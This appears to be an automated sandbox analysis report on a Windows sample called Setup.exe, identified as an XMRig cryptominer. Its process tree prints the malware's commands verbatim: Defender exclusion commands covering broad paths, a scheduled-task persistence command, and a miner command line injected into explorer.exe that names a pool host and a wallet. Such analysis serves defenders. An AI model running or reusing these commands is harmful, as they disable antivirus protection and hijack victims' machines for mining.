Analysis

  • max time kernel
    147s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-12-2024 17:21

General

  • Target

    Setup.exe

  • Size

    29.8MB

  • MD5

    f39a0615ad5482c3ffd8f46baeac3ac3

  • SHA1

    e4cd77ab330f734e7a5253c07c559e8c92d88c35

  • SHA256

    643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b

  • SHA512

    fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481

  • SSDEEP

    786432:PkvEnDem3vOYqVx9BvEiI8hXcclLOhiKw+HSD:svEn6mfN4xvcehFs7SD

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5068
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4260
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4724
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\system32\services64.exe
          C:\Windows\system32\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2200
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
            5⤵
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4828
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3612
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3128
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3420
            • C:\Windows\system32\Microsoft\Libs\sihost64.exe
              "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1840
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:1280
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=44uwibUE5EF8oiYGZWhDJ6YxTYoL8YgzyYw5ofRojJrtZydAndawV157eimKXonkgsi8ZNdvRq22xC6dmxwmq2tpQ4nTUDe --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:412

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

      Filesize

      646B

      MD5

      23867f73ff39fa0dfee6cfb5d3d176ab

      SHA1

      8705a09d38e5f0b034a6f4b4deb5817e312204e1

      SHA256

      f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88

      SHA512

      108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      77d622bb1a5b250869a3238b9bc1402b

      SHA1

      d47f4003c2554b9dfc4c16f22460b331886b191b

      SHA256

      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

      SHA512

      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      9a2c763c5ff40e18e49ad63c7c3b0088

      SHA1

      4b289ea34755323fa869da6ad6480d8d12385a36

      SHA256

      517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e

      SHA512

      3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      a2c8179aaa149c0b9791b73ce44c04d1

      SHA1

      703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

      SHA256

      c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

      SHA512

      2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puqasvg0.4xc.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\System32\Microsoft\Libs\sihost64.exe

      Filesize

      32KB

      MD5

      554b19e8d2cd3728ec5557c08cd2151b

      SHA1

      7f22b80a8b3a141a93735f4423fda76f914dd92c

      SHA256

      53b161d512a4cc0e7ad58be8bb5155e37399afe56cd7df38e9f0c4f09bb1cf56

      SHA512

      46103c9ffb4483107ad0f5b91aba14464747a75a058d2610714f7155e0c014b094de0fb7f40d1515a008f70763131a4b7964d739a2e4381ac38a47755f6938a0

    • C:\Windows\System32\services64.exe

      Filesize

      29.8MB

      MD5

      f39a0615ad5482c3ffd8f46baeac3ac3

      SHA1

      e4cd77ab330f734e7a5253c07c559e8c92d88c35

      SHA256

      643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b

      SHA512

      fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481

    • memory/412-72-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-79-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-84-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-76-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-78-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-81-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-80-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-74-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/412-75-0x0000000000800000-0x0000000000820000-memory.dmp

      Filesize

      128KB

    • memory/1280-83-0x000002465E470000-0x000002465E476000-memory.dmp

      Filesize

      24KB

    • memory/1280-82-0x000002465C950000-0x000002465C957000-memory.dmp

      Filesize

      28KB

    • memory/2892-8-0x00000208A63F0000-0x00000208A6412000-memory.dmp

      Filesize

      136KB

    • memory/5068-36-0x00007FFFD1780000-0x00007FFFD2241000-memory.dmp

      Filesize

      10.8MB

    • memory/5068-0-0x0000019EB2F20000-0x0000019EB4CDF000-memory.dmp

      Filesize

      29.7MB

    • memory/5068-5-0x0000019EB8600000-0x0000019EB860A000-memory.dmp

      Filesize

      40KB

    • memory/5068-2-0x00007FFFD1780000-0x00007FFFD2241000-memory.dmp

      Filesize

      10.8MB

    • memory/5068-4-0x0000019EB85C0000-0x0000019EB85D2000-memory.dmp

      Filesize

      72KB

    • memory/5068-32-0x00007FFFD1780000-0x00007FFFD2241000-memory.dmp

      Filesize

      10.8MB

    • memory/5068-6-0x00007FFFD1780000-0x00007FFFD2241000-memory.dmp

      Filesize

      10.8MB

    • memory/5068-3-0x0000019ED2DC0000-0x0000019ED4B7E000-memory.dmp

      Filesize

      29.7MB

    • memory/5068-1-0x00007FFFD1783000-0x00007FFFD1785000-memory.dmp

      Filesize

      8KB

    • memory/5068-7-0x00007FFFD1780000-0x00007FFFD2241000-memory.dmp

      Filesize

      10.8MB